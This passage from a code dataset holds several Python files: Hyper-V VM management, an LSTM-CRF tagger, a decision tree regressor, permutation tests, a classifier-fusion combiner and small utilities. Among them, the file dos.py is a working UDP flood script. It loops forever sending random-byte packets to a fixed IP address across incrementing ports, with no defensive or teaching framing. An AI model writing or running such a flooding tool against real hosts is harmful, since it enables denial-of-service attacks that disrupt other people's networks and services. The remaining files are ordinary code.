count=cpu)\n\n # Remove any existing NIC interfaces\n powershell.exec_powershell(\n 'remove-vmnetworkadapter', vmname=name)\n\n # Add NIC interfaces to VM (add-vmnetworkadapter)\n for vnic in vnic_list:\n powershell.exec_powershell(\n 'add-vmnetworkadapter', vmname=name, switchname=vnic.network,\n staticmacaddress=vnic.mac_addr, name=vnic.mac_addr)\n\n @classmethod\n def update(\n cls, name, vnic_list=None, cpu=1, memory=512, **kwargs):\n\n # Updating memory ( set-vm )\n # Create a VM (new-vm)\n powershell.exec_powershell(\n 'set-vm', name=name, memorystartupbytes=str(memory) + \"MB\")\n\n # Set CPU (set-vmprocessor)\n powershell.exec_powershell('set-vmprocessor', vmname=name, count=cpu)\n\n # Remove the existing network adapters except for Management Network.\n # Retaining management networks helps in saving MLTT licenses...\n mgmt_net_found = False\n 
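# track whether a management NIC already exists so it is not re-added below\n        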
if powershell.exec_powershell('get-vmnetworkadapter', vmname=name):\n for vnic in powershell.exec_powershell('get-vmnetworkadapter', vmname=name):\n if vnic.SwitchName != 'Management Network':\n powershell.exec_powershell('remove-vmnetworkadapter',\n vmname=name, name=vnic.Name)\n else:\n mgmt_net_found = True\n\n # Add NIC interfaces to VM (add-vmnetworkadapter)\n for vnic in vnic_list:\n if vnic.network == 'Management Network' and mgmt_net_found:\n continue\n powershell.exec_powershell(\n 'add-vmnetworkadapter', vmname=name, switchname=vnic.network,\n staticmacaddress=vnic.mac_addr, name=vnic.mac_addr)\n\n @classmethod\n def remove(cls, name):\n vm = powershell.exec_powershell(\n 'get-vm', name=name, select_clause='State')\n\n if len(vm) == 0:\n raise exception.NotFoundException(\n 'No such virtual machine %s' % name)\n\n vm = vm[0]\n if vm.State != 3:\n cls.power(name=name, oper='off')\n\n powershell.exec_powershell('remove-vm', name=name, force=True)\n\n @classmethod\n def power(cls, name, oper):\n mapping = {'on': 'start-vm', 'off': 'stop-vm'}\n\n if oper not in mapping:\n raise exception.ValueException(\n 'invalid operation %s. choices=[on|off]' % oper)\n\n try:\n if oper == 'off':\n powershell.exec_powershell(mapping[oper], name=name, force=True)\n else:\n powershell.exec_powershell(mapping[oper], name=name)\n except exception.ValueException:\n return True\n\n @classmethod\n def set_vnic(cls, name, test_ip_addr, **kwargs):\n test_mac_addr = test_network.get_mac_addr(test_ip_addr)\n powershell.exec_powershell(\n 'set-vmnetworkadapter', vmname=name, name=test_mac_addr, **kwargs)\n\n @classmethod\n def get_vm_list(cls):\n vm_list = powershell.exec_powershell('get-vm')\n return [vm.Name for vm in vm_list] if vm_list else []\n\n @classmethod\n def get_mgmt_ip_addr(cls, vm_name, ip_network):\n mgmt_ip_network = netaddr.IPNetwork(ip_network)\n\n iface_list = powershell.exec_powershell(\n 'get-vm', name=vm_name, select_clause='networkadapters'\n )[0].NetworkAdapters\n\n mgmt_ip_addr_list = []\n\n for iface in iface_list:\n for ip_network in iface['IPAddresses'].split():\n if netaddr.IPAddress(ip_network) in mgmt_ip_network:\n mgmt_ip_addr_list.append(ip_network)\n\n if len(mgmt_ip_addr_list) == 1:\n return mgmt_ip_addr_list[0]\n\n elif len(mgmt_ip_addr_list) > 1:\n raise exception.ConfigException(\n '%s has two management IP addresses (%s) that are belong to '\n 'the same subnet. 
This is likely a configuration error' % (\n                    vm_name, ', '.join(mgmt_ip_addr_list)))\n        else:\n            raise exception.ValueException(\n                'No management IP addresses are discovered')\n\n    @classmethod\n    def get_test_ip_addr(cls, vm_name):\n        test_ip_addr_dict = {}\n        iface_list = powershell.exec_powershell(\n            'get-vmnetworkadapter', vmname=vm_name,\n            select_clause='IPAddresses,MacAddress'\n        )\n\n        for iface in iface_list:\n            mac_addr = ':'.join(\n                digit.encode('hex') for digit in iface.MacAddress.decode('hex'))\n            if not mac_addr.startswith('b2'):\n                continue\n\n            test_ip_addr_dict[mac_addr] = {'ipv4': [], 'ipv6': []}\n\n            for ip_addr in iface.IPAddresses:\n                if re.match('\\d+\\.\\d+\\.\\d+\\.\\d+', ip_addr):  # IPv4\n                    test_ip_addr_dict[mac_addr]['ipv4'].append(ip_addr)\n                else:  # Assume IPv6\n                    if ip_addr.startswith('fe80:'):\n                        continue\n                    test_ip_addr_dict[mac_addr]['ipv6'].append(ip_addr)\n\n        return test_ip_addr_dict\n\n\n\n\n\n","sub_path":"lib/windows/virtual_machine/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} {"seq_id":"650103558","text":"# -*- coding: utf-8 -*-\n# this file is used to define customized settings\nimport os\n\nmssql_database = '[10.0.0.201].CrowdDB.dbo'\nmssql_tables = {\n\t'project': '.Project',\n\t'data_result': '.DataResult',\n\t'data_source': '.DataSource',\n\t'person': '.Person',\n\t'person_in_project': '.PersonInProject',\n}\n\napps = [\n\t'clothmark',\n\t'clothmark_2',\n\t'facecmu',\n\t'fridge_mark',\n\t'10000face',\n\t'rectangle_box',\n\t'Ch_faces',\n\t'Ch_faceX',\n\t'shooting_range',\n\t'street_license',\n\t'faceinvideo'\n]\n\nDEFAULT_DECODING = \"utf-8\"\nDEFAULT_ENCODING = \"utf-8\"\nEDITOR = \"notepad\"\n","sub_path":"src/settings_local.py","file_name":"settings_local.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} {"seq_id":"194723365","text":"import torch\nfrom torch import nn\nfrom torchcrf import CRF\n\nclass NER_LSTM_CRF(nn.Module):\n    def __init__(self,\n                 embedding_dim, # word embedding dimension\n                 hidden_dim, # hidden layer size\n                 dropout, # dropout rate\n                 word2id, # word-to-id mapping\n                 tag2id): # tag-to-id mapping\n        super().__init__()\n\n        self.embedding_dim = embedding_dim\n        self.hidden_dim = hidden_dim\n        self.vocab_size = len(word2id) + 1\n        self.tag_to_idx = tag2id\n        self.target_size = len(tag2id)\n\n        self.word_embeds = nn.Embedding(self.vocab_size, self.embedding_dim)\n        self.dropout = nn.Dropout(dropout)\n\n        # bidirectional LSTM, so each direction outputs self.hidden_dim // 2 units\n        self.lstm = nn.LSTM(self.embedding_dim, self.hidden_dim // 2, num_layers=1,\n                            bidirectional=True, batch_first=False)\n\n        # fully connected output layer\n        # input dimension: self.hidden_dim\n        # output dimension: self.target_size\n        self.hidden2tag = nn.Linear(self.hidden_dim, self.target_size)\n        self.crf = CRF(self.target_size, batch_first=False)\n\n    def forward(self, x):\n        x = x.transpose(0,1)\n\n        # word embedding\n        embedding = self.word_embeds(x)\n\n        # LSTM output\n        outputs, hiddens = self.lstm(embedding)\n\n        # dropout\n        outputs = self.dropout(outputs)\n\n        # project down to tag scores\n        outputs = self.hidden2tag(outputs)\n\n        # decode with the CRF\n        outputs = self.crf.decode(outputs)\n        return outputs\n\n    def log_likehood(self, x, tags):\n        \"\"\"\n        Negative log-likelihood of the CRF (training loss)\n        \"\"\"\n        x = x.transpose(0, 1)\n        tags = tags.transpose(0, 1)\n\n        embedding = self.word_embeds(x)\n        outputs, hidden = self.lstm(embedding)\n        outputs = self.dropout(outputs)\n        outputs = self.hidden2tag(outputs)\n\n        return - self.crf(outputs, 
tags)","sub_path":"model/LSTM_CRF.py","file_name":"LSTM_CRF.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"137149632","text":"import numpy as np\nimport pandas as pd\nimport math\nfrom Tree import *\n\nclass DecisionTreeRegressor:\n def __init__(self, filepath, max_depth):\n self.filepath = filepath\n self.max_depth = max_depth\n self.data = self.load_data()\n self.tree = Tree()\n\n def load_data(self):\n return pd.read_csv(self.filepath)\n\n def calculate_standard_deviation(self, data):\n return data[\"class\"].std()\n\n def get_all_splits(self, data, col):\n col_vals = data[col].unique()\n return self.get_all_splits_helper(col_vals, 0, np.array([]), np.array([]))\n\n def get_all_splits_helper(self, col_vals, col_ind, left_split, right_split):\n if col_ind == len(col_vals):\n return np.array([[left_split, right_split]])\n left_result = np.array([[[]]])\n right_result = np.array([[[]]])\n if left_split.shape[0] < len(col_vals) - 1:\n left_result = self.get_all_splits_helper(col_vals, col_ind+1, np.append(left_split, col_vals[col_ind]), right_split)\n if right_split.shape[0] < len(col_vals) - 1:\n right_result = self.get_all_splits_helper(col_vals, col_ind+1, left_split, np.append(right_split, col_vals[col_ind]))\n if left_result.size > 0 and right_result.size > 0:\n return np.concatenate((left_result, right_result), axis=0)\n return left_result if left_result.size > 0 else right_result\n\n\n def get_average(self, data):\n return data[\"class\"].mean()\n\n def calculate_std_gain(self, original_std, data, col):\n total_count = data.shape[0]\n splits = self.get_all_splits(data, col)\n max_gain = 0\n max_left_split = np.array([])\n max_right_split = np.array([])\n max_left_split_cats = np.array([])\n max_right_split_cats = np.array([])\n for split in splits:\n split_data_left = data.loc[data[col].isin(split[0]), :]\n split_data_right = data.loc[data[col].isin(split[1]), :]\n std = split_data_left.shape[0] / total_count * self.calculate_standard_deviation(split_data_left) + split_data_right.shape[0] / total_count * self.calculate_standard_deviation(split_data_right)\n gain = original_std - std\n if gain > max_gain:\n max_gain = gain\n max_left_split = split_data_left\n max_right_split = split_data_right\n max_left_split_cats = split[0]\n max_right_split_cats = split[1]\n return (max_gain, max_left_split, max_right_split, max_left_split_cats, max_right_split_cats)\n\n def get_max_col(self, data):\n cols = list(data)\n data_std = self.calculate_standard_deviation(data)\n max_criteria_val = 0\n max_col = 0\n max_left_split = np.array([])\n max_right_split = np.array([])\n max_left_split_cats = np.array([])\n max_right_split_cats = np.array([])\n for index, col in enumerate(cols):\n if index < len(cols) - 1:\n (criteria_val, left_split, right_split, left_split_cats, right_split_cats) = self.calculate_std_gain(data_std, data, col)\n if criteria_val > max_criteria_val:\n max_criteria_val = criteria_val\n max_left_split = left_split\n max_right_split = right_split\n max_left_split_cats = left_split_cats\n max_right_split_cats = right_split_cats\n max_col = index\n return (max_col, max_left_split, max_right_split, max_left_split_cats, max_right_split_cats)\n\n def train(self):\n self.tree = Tree(self.train_with_depth(self.data, self.max_depth))\n\n def train_with_depth(self, data, maxDepth):\n if maxDepth == 0:\n leaf = Node()\n leaf.value = self.get_average(data)\n return leaf\n else:\n cur = 
Node()\n (max_col, max_left_split, max_right_split, max_left_split_cats, max_right_split_cats) = self.get_max_col(data)\n cols = list(data)\n cur.col = max_col\n cur.value = self.get_average(data)\n cur.left_split_cats = max_left_split_cats\n cur.right_split_cats = max_right_split_cats\n if max_left_split.shape[0] > 0:\n cur.add_child(self.train_with_depth(max_left_split, maxDepth-1))\n if max_right_split.shape[0] > 0:\n cur.add_child(self.train_with_depth(max_right_split, maxDepth-1))\n return cur\n\n def predict(self, sample):\n return self.predict_with_node(sample, self.tree.head)\n\n def predict_with_node(self, sample, cur):\n if cur.col == -1:\n return cur.value\n if (sample[cur.col] in cur.left_split_cats) and len(cur.children) > 0:\n return self.predict_with_node(sample, cur.children[0])\n if (sample[cur.col] in cur.right_split_cats) and len(cur.children) > 1:\n return self.predict_with_node(sample, cur.children[1])\n return cur.value","sub_path":"DecisionTreeRegressor.py","file_name":"DecisionTreeRegressor.py","file_ext":"py","file_size_in_byte":5028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"89067673","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import division, print_function, absolute_import\n\nimport math\n\nimport numpy as np\nfrom scipy.stats import (binom,\n hypergeom,\n ttest_ind)\nfrom scipy.optimize import brentq\n\n\ndef binoLowerCL(n, x, cl=0.975, p=None, xtol=1e-12, rtol=4.4408920985006262e-16, maxiter=100):\n \"Lower confidence level cl confidence interval for Binomial p, for x successes in n trials\"\n if p is None:\n p = x/n\n lo = 0.0\n if (x > 0):\n f = lambda q: cl - binom.cdf(x - 1, n, q)\n lo = brentq(f, 0.0, p, xtol, rtol, maxiter)\n return lo\n\n\ndef binoUpperCL(n, x, cl=0.975, p=None, xtol=1e-12, rtol=4.4408920985006262e-16, maxiter=100):\n \"Upper confidence level cl confidence interval for Binomial p, for x successes in n trials\"\n if p is None:\n p = x/n\n hi = 1.0\n if (x < n):\n f = lambda q: binom.cdf(x, n, q) - (1 - cl)\n hi = brentq(f, p, 1.0, xtol, rtol, maxiter)\n return hi\n\n\ndef permuTestMean(x, y, reps=10 ** 5, stat='mean', side='greater_than', CI=False, CL=0.95):\n \"\"\"\n One-sided or two-sided, two-sample permutation test for equality of two\n means, with p-value estimated by simulated random sampling with reps replications.\n\n Tests the hypothesis that x and y are a random partition of x,y\n against the alternative that x comes from a population with mean\n (a) greater than that of the population from which y comes, if side = 'greater_than'\n (b) less than that of the population from which y comes, if side = 'less_than'\n (c) different from that of the population from which y comes, if side = 'both'\n\n If stat == 'mean', the test statistic is (mean(x) - mean(y))\n (equivalently, sum(x), since those are monotonically related)\n\n If stat == 't', the test statistic is the two-sample t-statistic--but the p-value\n is still estimated by the randomization, approximating the permutation distribution.\n The t-statistic is computed using scipy.stats.ttest_ind\n\n If CI == 'upper', computes an upper confidence bound on the true\n p-value based on the simulations by inverting Binomial tests.\n\n If CI == 'lower', computes a lower confidence bound on the true\n p-value based on the simulations by inverting Binomial tests.\n\n If CI == 'both', computes lower and upper confidence bounds on the true\n p-value based on the simulations by inverting Binomial tests.\n\n CL is the 
confidence limit for the confidence bounds.\n\n    output is the estimated p-value and the test statistic, if CI == False\n    output is the estimated p-value, the lower or upper confidence bound, and the test statistic, if CI in {'lower','upper'}\n    output is the estimated p-value, the (lower, upper) confidence bounds, and the test statistic, if CI == 'both'\n\n    Dependencies: numpy, numpy.random, scipy.stats, binoUpperCL, binoLowerCL\n\n    \"\"\"\n    z = np.concatenate([x, y])  # pooled responses\n    stats = dict(\n        mean=lambda u: np.mean(u[:len(x)]) - np.mean(u[len(x):]),\n        t=lambda u: ttest_ind(\n            u[:len(x)], u[len(x):], equal_var=True)[0]\n    )\n    try:\n        tst = stats[stat]\n    except KeyError:\n        raise ValueError(\"Unrecognized test statistic (stat): \" + stat)\n    if side == 'greater_than':\n        theStat = tst\n    elif side == 'less_than':\n        theStat = lambda u: -tst(u)\n    elif side == 'both':\n        theStat = lambda u: math.fabs(tst(u))\n    else:\n        raise ValueError(\"Unrecognized side choice: \" + side)\n    ts = theStat(z)\n    hits = np.sum([(theStat(np.random.permutation(z)) >= ts)\n                   for i in range(reps)])\n    if CI == 'upper':\n        return hits/reps, binoUpperCL(reps, hits, cl=CL), ts\n    elif CI == 'lower':\n        return hits/reps, binoLowerCL(reps, hits, cl=CL), ts\n    elif CI == 'both':\n        return hits/reps, \\\n            (binoLowerCL(reps, hits, cl=1 - (1 - CL) / 2), binoUpperCL(reps, hits, cl=1 - (1 - CL) / 2)), \\\n            ts\n    else:\n        return hits/reps, ts\n\n\n\ndef stratifiedPermutationTestMean(group, condition, response, groups, conditions):\n    '''\n    Calculates variability in sample means between treatment conditions, within groups.\n    If there are two treatment conditions, the test statistic is the difference in means,\n    aggregated across groups.\n    If there are more than two treatment conditions, the test statistic is the standard deviation of\n    the means, aggregated across groups.\n    '''\n    tst = 0.0\n    if (len(groups) < 2):\n        raise ValueError('Number of groups must be at least 2.')\n    elif (len(groups) == 2):\n        stat = lambda u: u[0] - u[1]\n    elif (len(groups) > 2):\n        stat = lambda u: np.std(u)\n    for g in groups:\n        gg = group == g\n        x = [gg & (condition == c) for c in conditions]\n        tst += stat([response[x[j]].mean() for j in range(len(x))])\n    return tst\n\n\ndef permuteWithinGroups(group, condition, groups):\n    permuted = condition.copy()\n    for g in groups:\n        gg = group == g\n        permuted[gg] = np.random.permutation(condition[gg])\n    return permuted\n\n\ndef stratifiedPermutationTest(group, condition, response, iterations=1.0e4, testStatistic=stratifiedPermutationTestMean):\n    '''\n    Stratified permutation test using the sum of the differences in means between two or more conditions in\n    each group (stratum) as the test statistic.\n    The test statistic is\n    \\sum_{g in groups} [\n        f(mean(response for cases in group g assigned to each condition))\n    ].\n    The function f is the difference if there are two conditions, and the standard deviation if there are\n    more than two conditions.\n    There should be at least one group and at least two conditions.\n    Under the null hypothesis, all assignments to the two conditions that preserve the number of\n    cases assigned to the conditions are equally likely.\n    Groups in which all cases are assigned to the same condition are skipped; they do not contribute\n    to the p-value since all randomizations give the same contribution to the difference in means.\n\n    Dependencies: numpy (as np)\n    '''\n    groups = np.unique(group)\n    conditions = np.unique(condition)\n    if len(conditions) < 2:\n        return 1.0, 1.0, 1.0, np.nan, None\n    else:\n        tst = testStatistic(group, condition, response, groups, conditions)\n        dist = np.zeros(int(iterations))\n        for i in range(int(iterations)):\n            dist[i] = testStatistic(group,\n                                    
permuteWithinGroups(\n                                        group, condition, groups),\n                                    response, groups, conditions\n                                    )\n\n        # define the conditions, then map count_nonzero over them\n        conds = [dist <= tst, dist >= tst, abs(dist) >= abs(tst)]\n        pLeft, pRight, pBoth = np.array(\n            list(map(np.count_nonzero, conds))) / iterations\n        return pLeft, pRight, pBoth, tst, dist\n\n","sub_path":"permute/permute.py","file_name":"permute.py","file_ext":"py","file_size_in_byte":7087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} {"seq_id":"55549505","text":"class Solution:\n    \"\"\"\n    @param matrix: an input matrix\n    @return: nums[0]: the maximum,nums[1]: the minimum\n    \"\"\"\n\n    def maxAndMin(self, matrix):\n        # write your code here\n        if not matrix: return []\n        mx = mn = matrix[0][0]\n        for row in matrix:\n            for e in row:\n                mx, mn = max(mx, e), min(mn, e)\n        return [mx, mn]\n","sub_path":"lintcode/770-maximum-and-minimum.py","file_name":"770-maximum-and-minimum.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} {"seq_id":"296572880","text":"import sys\nimport os\nimport time\nimport socket\nimport random\n\n\n##############\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nbytes = random._urandom(1490)\n#############\narr = []\n\n\ndef dos(ip,port):\n    sent = 0\n\n    sock.sendto(bytes, (ip,port))\n    sent = sent + 1\n    print(sock)\n    print (\"Sent %s packet to %s through port:%s\"%(sent,ip,port))\n\n\n\nif __name__ == '__main__':\n    port =3000\n    while True:\n        port=port+1\n        d=dos('172.18.144.1',port)\n        print(d)","sub_path":"dos.py","file_name":"dos.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} {"seq_id":"135809266","text":"from pusion.auto.detector import *\nfrom pusion.auto.generic_combiner import GenericCombiner\nfrom pusion.evaluation.evaluation_metrics import *\nfrom pusion.util.generator import *\n\n\nclass AutoCombiner(GenericCombiner):\n    \"\"\"\n    The `AutoCombiner` allows for automatic decision fusion using all methods provided by the framework, which are\n    applicable to the given problem. The key feature of this combiner is the transparency in terms of its outer\n    behaviour. Based on the usage (i.e. method calls) and the automatically detected configuration,\n    the `AutoCombiner` preselects all compatible methods from `pusion.core`. The main purpose is to retrieve fusion\n    results obtained by the methods with the best performance without further user interaction.\n    \"\"\"\n\n    _SUPPORTED_PAC = [\n        (Problem.GENERIC, AssignmentType.GENERIC, CoverageType.GENERIC),\n        (Problem.MULTI_CLASS, AssignmentType.CRISP, CoverageType.REDUNDANT),\n        (Problem.MULTI_CLASS, AssignmentType.CONTINUOUS, CoverageType.REDUNDANT),\n        (Problem.MULTI_LABEL, AssignmentType.CRISP, CoverageType.REDUNDANT),\n        (Problem.MULTI_LABEL, AssignmentType.CONTINUOUS, CoverageType.REDUNDANT),\n        (Problem.MULTI_CLASS, AssignmentType.CRISP, CoverageType.COMPLEMENTARY_REDUNDANT),\n        (Problem.MULTI_CLASS, AssignmentType.CONTINUOUS, CoverageType.COMPLEMENTARY_REDUNDANT),\n        (Problem.MULTI_LABEL, AssignmentType.CRISP, CoverageType.COMPLEMENTARY_REDUNDANT),\n        (Problem.MULTI_LABEL, AssignmentType.CONTINUOUS, CoverageType.COMPLEMENTARY_REDUNDANT)\n    ]\n\n    def __init__(self):\n        super().__init__()\n        self.selected_combiner = None\n        self.validation_size = 0.5\n\n    def train(self, decision_tensor, true_assignments):\n        \"\"\"\n        Train the AutoCombiner (AC) model. 
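A minimal usage sketch (hypothetical variable names; shapes as documented for the parameters below)::\n\n            ac = AutoCombiner()\n            ac.train(decision_tensor, true_assignments)  # fits every applicable core method, keeps the most accurate\n            fused = ac.combine(decision_tensor)\n\n        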
This method detects the configuration based on the ``decision_tensor`` and\n trains all trainable combiners that are applicable to this configuration.\n\n :param decision_tensor: `numpy.array` of shape `(n_classifiers, n_samples, n_classes)` or a `list` of\n `numpy.array` elements of shape `(n_samples, n_classes')`, where `n_classes'` is classifier-specific\n due to the coverage.\n\n Tensor of either crisp or continuous decision outputs by different classifiers per sample.\n\n :param true_assignments: `numpy.array` of shape `(n_samples, n_classes)`.\n Matrix of either crisp or continuous class assignments which are considered true for each sample during\n the training procedure.\n \"\"\"\n\n # Split into train and validation data.\n dt_train, ta_train, dt_valid, ta_valid = split_into_train_and_validation_data(decision_tensor, true_assignments,\n self.validation_size)\n # Encapsulated training phase.\n super().train(dt_train, ta_train)\n # Encapsulated evaluation phase.\n super().combine(dt_valid)\n performance_per_combiner = np.zeros(len(self.combiners))\n for i in range(len(self.combiners)):\n comb_res = self.multi_combiner_decision_tensor[i]\n performance_per_combiner[i] = accuracy(ta_valid, comb_res)\n self.selected_combiner = self.combiners[performance_per_combiner.argmax()]\n # Clear temporarily obtained fusion results.\n self.multi_combiner_decision_tensor = []\n # Here, the AutoCombiner could be trained on the whole dataset again.\n # super().train(decision_tensor, true_assignments)\n\n def combine(self, decision_tensor):\n \"\"\"\n Combine decision outputs using the AutoCombiner (AC) model. Both continuous and crisp classification outputs are\n supported. This procedure involves selecting the best method regarding its classification performance in case\n of a trained AC.\n\n :param decision_tensor: `numpy.array` of shape `(n_classifiers, n_samples, n_classes)` or a `list` of\n `numpy.array` elements of shape `(n_samples, n_classes')`, where `n_classes'` is classifier-specific\n due to the coverage.\n\n Tensor of either crisp or continuous decision outputs by different classifiers per sample.\n\n :return: A matrix (`numpy.array`) of crisp or continuous class assignments which represents fused decisions.\n Axis 0 represents samples and axis 1 the class labels which are aligned with axis 2 in\n ``decision_tensor`` input tensor.\n \"\"\"\n super().combine(decision_tensor) # TODO: Delete. Left for insights into performances of preselected combiners.\n\n if self.selected_combiner is not None:\n return self.selected_combiner.combine(decision_tensor)\n else:\n raise TypeError(\"No selection performed. Use train() before combining to obtain an automatic selection.\")\n\n def set_validation_size(self, validation_size):\n \"\"\"\n Set the validation size, based on which the training data is split and the best combiner is selected.\n\n :param validation_size: A `float` between `0` and `1.0`. 
Ratio of the validation data set.\n \"\"\"\n self.validation_size = validation_size\n\n def get_selected_combiner(self):\n \"\"\"\n :return: The method selected by the `AutoCombiner`.\n \"\"\"\n return self.selected_combiner\n","sub_path":"pusion/auto/auto_combiner.py","file_name":"auto_combiner.py","file_ext":"py","file_size_in_byte":5423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"337339328","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nimport os,sys,math,argparse,ast\nimport pandas as pd\nimport numpy as np\nimport datasets as ds\nfrom models import *\n\n# Parsing arguments\nparser = argparse.ArgumentParser(description='Training args')\nparser.add_argument('--model', type=str, required=True)\nparser.add_argument('--dataname', type=str, required=True)\nparser.add_argument('--epoch', type=int, default=20)\nparser.add_argument('--batchsize', type=int, default=32)\nparser.add_argument('--output', default='tmp')\nparser.add_argument('--gpu', type=int, default=0)\nparser.add_argument('--val',help='True or False flag, input should be either \"True\" or \"False\".',type=ast.literal_eval, default=True)\nargs = parser.parse_args()\n\n# select gpu\nos.environ['CUDA_VISIBLE_DEVICES'] = str(args.gpu)\n\ndataset = ds.load_data(args)\ndataset.get_validation()\n\n# Construct model\nif args.model not in models:\n raise Exception('Unknown model:', args.model)\n\nmodel = models[args.model](\n input_shape=dataset.get_input_shape(),\n output_shape=dataset.get_output_shape(),\n output=args.output\n)\n\nmodel.main_loop(dataset,\n epochs = args.epoch,\n batchsize = args.batchsize,\n reporter = ['loss'],\n validation = args.val\n)\n\nx_gen,y_sample = model.decodey(dataset.test_labels,resample_num=10)\ngen_data = np.hstack((y_sample, x_gen))\nnp.savetxt('gen_data.csv', gen_data, fmt='%.3f',delimiter = ',')","sub_path":"run_cvae.py","file_name":"run_cvae.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"114342320","text":"\"\"\"\n Run\n python3 read_dmm.py \n\"\"\"\nimport sys\nimport time\nimport serial\nimport string as str\n\ndef read_from_dmm():\n # ~ ser.write(b':ABORt?\\r\\n')\n # ~ ser.write(b'INITiate\\r\\n')\n ser.write(b':DATA:FRESH?\\r\\n')\n #ser.write(b':FETCh?\\r\\n')\n ser.flush()\n\n out = bytes()\n\n time.sleep(0.1) # wait for 100ms for measurements\n while ser.inWaiting() > 0:\n out += ser.read(1)\n if out != '':\n out=out.rstrip()\n\n print(len(out))\n\n return out.decode(\"utf-8\")\n\n\n# configure the serial connections\nser = serial.Serial(\n port='/dev/ttyUSB0',\n baudrate=19200\n)\n\nif ser.isOpen() == False:\n ser.open()\nelse:\n ser.close()\n ser.open()\n\nser.reset_output_buffer()\nser.reset_input_buffer()\n\nser.flushInput()\nser.flushOutput()\n\n#ser.open()\n#ser.isOpen()\n\n#C0s =[150, 330, 560, 820, 1150] # coupling, pF\n\nlogfile= sys.argv[1];\nfreq_start = int(sys.argv[2]) # start frequency , Hz\nfreq_end = int(sys.argv[3]) # end frequency, Hz\ndf = int(sys.argv[4]) # frequency step, Hz\n\n\nwith open(logfile,'a') as f:\n f.write(\"#\" + \"-\"*80 + \"\\n\")\n\n freq = freq_start\n\n while freq <= freq_end:\n\n print(\"-\"*80, \"\\nfreq=\", freq, \" .. 
press ENTER", flush=True)\r\n\r\n        input()\r\n\r\n        val = read_from_dmm() # in [mVAC]\r\n\r\n        print("value=", val, flush=True)\r\n\r\n        f.write("%d %s\\n" % (freq, val))\r\n        f.flush()\r\n\r\n        freq = freq + df\r\n\r\n\r\n#\r\n# testing\r\n#\r\n# ~ while True:\r\n    # ~ print("-"*80, "\\nTo read press ENTER", flush=True)\r\n\r\n    # ~ input()\r\n\r\n    # ~ val = read_from_dmm() # in [mVAC]\r\n\r\n    # ~ print("value=", val, flush=True)\r\n","sub_path":"sknikr/SkNiKr_podatki/meritve/SinusnoSiljenje/read_dmm.py","file_name":"read_dmm.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} {"seq_id":"638747206","text":"def merge(left, right):\r\n    # merge two already-sorted lists into one sorted list\r\n    merged = []\r\n    i = j = 0\r\n    while i < len(left) and j < len(right):\r\n        if left[i] <= right[j]:\r\n            merged.append(left[i])\r\n            i += 1\r\n        else:\r\n            merged.append(right[j])\r\n            j += 1\r\n    return merged + left[i:] + right[j:]\r\n\r\n\r\ndef merge_sort(xlist):\r\n    if len(xlist) <= 1:\r\n        return xlist\r\n    else:\r\n        xleft = xlist[:len(xlist)//2]\r\n        xright = xlist[len(xlist)//2:]\r\n        sorted_left = merge_sort(xleft)\r\n        sorted_right = merge_sort(xright)\r\n        return merge(sorted_left,sorted_right)\r\n    \r\n","sub_path":"PythonExercise/mergesort.py","file_name":"mergesort.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} {"seq_id":"28727027","text":"from flask import Flask\nfrom flask import render_template # Add this as the last import at the beginning of the file\n\n# create an instance of our class and pass the name of our module\n# the app instance needs to know the name so it can find our templates and static folder files\napp = Flask(__name__)\n\nages = {\n    'bob': '43',\n    'alice': '29'\n}\n\n@app.route('/users/<user>')\ndef users(user):\n    age = ages.get(user)\n    return render_template('users.html', user=user, age=age)\n\n# A route has been defined using a decorator. Unlike the timeit decorator,\n# this one takes a url as an argument. The decorator is saying ‘if the user navigates to the\n# address /, then run the function below’, i.e. 
the decorated function.\n@app.route('/')\ndef hello_world():\n    # Our function returns the text ‘Hello World’\n    return 'Hello World!'\n\n# use if __name__ == ‘__main__’: to ensure the app is only run when instantiated directly\n# from the Python interpreter, not when imported from another file\nif __name__ == '__main__':\n    # run our app using app.run()\n    app.run()\n\n'''\nIt’s also possible to automatically convert numbers to ints and floats by using this conversion syntax.\n\nIf our users were stored in a list, we could have used this syntax:\n\n@app.route('/users/<int:user_id>')\ndef users(user_id):\n'''\n","sub_path":"Stream-2/Back-End-Development/32.Flask/5.Templates/flask_test.py","file_name":"flask_test.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} {"seq_id":"519786716","text":"import argparse\nimport sys\n\n\n# MAIN -------------------------------------------------------------------- #\nif __name__ == '__main__':\n    # parsing arguments\n    parser = argparse.ArgumentParser(\n        description='Find triangular number')\n    parser.add_argument('-n','--number', type=int,\n                        help='integer')\n    args = parser.parse_args()\n\n    # checking if the given number is positive\n    if args.number <= 0:\n        print('argument must be a positive integer')\n        sys.exit()\n\n    # calculating value of given number\n    #T = (n)(n + 1) / 2.\n    out = int(args.number *(args.number + 1) / 2)\n    \n    # printing output\n    print('given number:', args.number)\n    print('triangular number:', out)","sub_path":"PC70_Triangle_Number_Calculator/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} {"seq_id":"315028433","text":"\"\"\"\nIn some applications of a binary tree, only the leaf nodes contain\nactual information. For example, in a single knockout tournament\norganized as a binary tree, we 